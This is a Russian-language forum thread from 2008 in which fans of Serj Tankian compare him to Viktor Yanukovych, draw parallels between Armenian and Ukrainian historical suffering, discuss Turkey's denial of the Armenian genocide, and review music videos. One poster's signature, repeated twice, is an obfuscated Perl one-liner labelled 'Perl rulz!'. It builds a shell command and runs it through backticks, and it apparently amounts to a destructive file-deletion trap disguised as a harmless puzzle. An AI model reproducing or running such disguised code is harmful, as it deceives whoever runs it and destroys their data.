Добавлено: Вт Янв 08, 2008 1:47 am Заголовок сообщения:
и давно ташкент в уркаинi? _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Я так понял, что поклонниками Сержа являются жители областей Украины, где доминирует Партия регионов. Донецк, Луганск и Харьков. Таким образом, можно сказать, что Виктор Янукович и Серж Танкян имеют что-то общее. Необъяснимо, но факт.
вообщето, если уж сравнивать Сержика и Януковича, то это как теплое с мягким(ну а если по конкретным жизненным позициям, то это как мороз -30 и жара +30).
А если уж брать во внимание некие парралели в истории армянского народа и украинского, то тут они есть.. наш народ уничтожали, и народ Сержа также уничтожали, причем теми же методами.. так же врывались в хаты, также насиловали матерей на глазах у детей и много еще неприятных вещей..
Наши земли также остались в составе соседней страны, где до сих пор говорят по украински.. но блин, хули ж тут поделаешь, надо адекватно расценивать ситуацию, а не кричать про ножи и про то чтоб поубивать кого бы там ни было.
А почитав последние страницы этой темы, выпирает наружу один факт.. кое у кого еще как минимум пару лет будет играть в дупе юношеский максимализм, а обостренное чувство справедливости скоро притупиться, ибо мозгов прибавиться, и понимания некоторых вещей в этой жизни.
А вообще не помешало бы в теме про Сержа говорить про Сержа _________________ не забудте взять полотенце...
вообщето, если уж сравнивать Сержика и Януковича, то это как теплое с мягким(ну а если по конкретным жизненным позициям, то это как мороз -30 и жара +30).
а чем не разговор про сержа?))) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
О прошлом надо помнить, но не постоянно вытаскивать его наружу. Я лично никак не помогу всем погибшим и в Украине и в Армении и в Росии могу только помнить о них... А геноцид или война в ответ на геноцид или войну - не выход.
По теме - Собрал уже все клипы кроме Прейз зе год. Бетховен понравился. Посмотрел лайв Сержа - кльово, есть еще порох у него где-то.... _________________
Решил что-то ляпнуть про Януковича и прочих.Предпочтений среди украинских политиков не имею,так как сомневаюсь,что кто-то из них всерьёз будет заботиться о стране.
roland-s писал(а):
кое у кого еще как минимум пару лет будет играть в дупе юношеский максимализм, а обостренное чувство справедливости скоро притупиться, ибо мозгов прибавиться, и понимания некоторых вещей в этой жизни.
Это про меня что ли?Росто я намёки плохо понимаю,так что если что-то есть-говорите прямо без всяких "кое у кого". _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Это про меня что ли?Росто я намёки плохо понимаю,так что если что-то есть-говорите прямо без всяких "кое у кого".
нет, не про тебя думал, а вообще я имел в виду всех кто учавствовал в той дискусии, максимализм присутствует в той или иной степени у всех нас, у когото больше, у когоот меньше вот у некоторых он черезчур буйствует. У меня самого тоже было.. прошло.
Не писал конкретно, т.к. это не суть важно, это ж не значит что я кого то считаю тупым или умным и т.п.(и кого это вообще должно волновать?) Разные люди и воспринимают по разному разные слова в свою сторону.
А, и меня можно называть на "ты", если что. genj
Цитата:
а у меня антилопы нет,гворят клип гавно.
люди много чего говорят, ты сам посмотри и зацени
ИМХО, клип так се..
THORON
Цитата:
А геноцид или война в ответ на геноцид или войну - не выход.
я более чем уверен, что и Серж считает примерно так же.
Никого резать нимкто не призывает. СОАД желает признания того, что геноцид армян был.. это типо как "извините, да , была х*йня в истории, да были ошибки, и мы о них сожалеем и больше не допустим такого, помянем умерших". Но Турция этого не признает, т.к. это признание своих ошибок, кроме того после признания геноцида появяться новые претензии, и более опасные.. опасность для целостности страны.
Это как если бы мы Тузлу отдали, дай кому нить палец, и будь уверен, что тебе руку отрызут как минимум. _________________ не забудте взять полотенце...
genj, ты наверное имел в виду не геноцид русских в Узбекистане, а геноцид казахов в Казахстане, как раз в те же времена когда это происходило на наших землях.
Власть боролась с "опасной тенденцией нарастания националистических настроений в республиках". _________________ не забудте взять полотенце...